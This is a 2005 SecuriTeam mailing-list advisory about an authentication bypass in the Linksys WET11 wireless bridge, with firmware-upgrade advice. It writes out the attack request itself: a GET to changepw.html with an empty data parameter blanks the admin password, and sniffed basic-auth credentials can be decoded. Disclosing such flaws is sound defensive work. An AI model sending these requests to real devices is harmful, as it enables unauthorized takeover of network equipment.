From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 10 Apr 2005 13:23:59 +0200
Subject: [NEWS] Cisco Linksys WET11 Password Resetting
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050410103749.9041257E8@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Cisco Linksys WET11 Password Resetting
------------------------------------------------------------------------
SUMMARY
<http://www.linksys.com/products/product.asp?grid=33&scid=36&prid=602>;
Linksys WET11 is "an Ethernet wireless bridge". It is possible to bypass
the authentication mechanism utilized by the Linksys WET11 by sending a
crafted HTTP GET command.
DETAILS
Vulnerable Systems:
* Linksys WET11 v1 (revisions prior to 1.5.4)
The change password utility provided on the device uses HTTP GET to send
an obfuscated password as a parameter to the changepw.html page. The field
that holds the password is named data.
The following is an example URL issued when the user tries to change the
password to admin:
http://x.x.x.x/changepw.html?data=XVQsZV3.................
The encoding of the passwords is quite predictable, here are some examples
of the passwords "a" through "h":
http://x.x.x.x/changepw.html?data=XP......................
http://x.x.x.x/changepw.html?data=Xf......................
http://x.x.x.x/changepw.html?data=Xv......................
http://x.x.x.x/changepw.html?data=Y.......................
http://x.x.x.x/changepw.html?data=YP......................
http://x.x.x.x/changepw.html?data=Yf......................
http://x.x.x.x/changepw.html?data=Yv......................
http://x.x.x.x/changepw.html?data=Z.......................
If the attacker is already on the network he/she can decode base64 encoded
basic authentication from sniffed packets, thus bypassing the password
mechanism.
However, it is also possible to change the password blindly on this device
doing the following:
http://x.x.x.x/changepw.html?data=........................
The above URL will create a blank password and allow you to login without
knowing the old password. There is no verification when you change the
password. In the newest version 1.5.4 of the firmware for the WET11 v1
device, however, someone must have logged in recently (timeout is _LONG_
though) to allow for this attack (i.e. it will request the old password).
Solution:
Upgrade to the latest firmware to deter blind password resetting. Be aware
that there is still no old password authentication when changing the
password even in 1.5.4. The latest firmware can be obtained from:
<http://www.linksys.com/download/firmware.asp>;
http://www.linksys.com/download/firmware.asp.
ADDITIONAL INFORMATION
The information has been provided by
<mailto:khermansen@ht-technology.com.> Kristian Hermansen.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
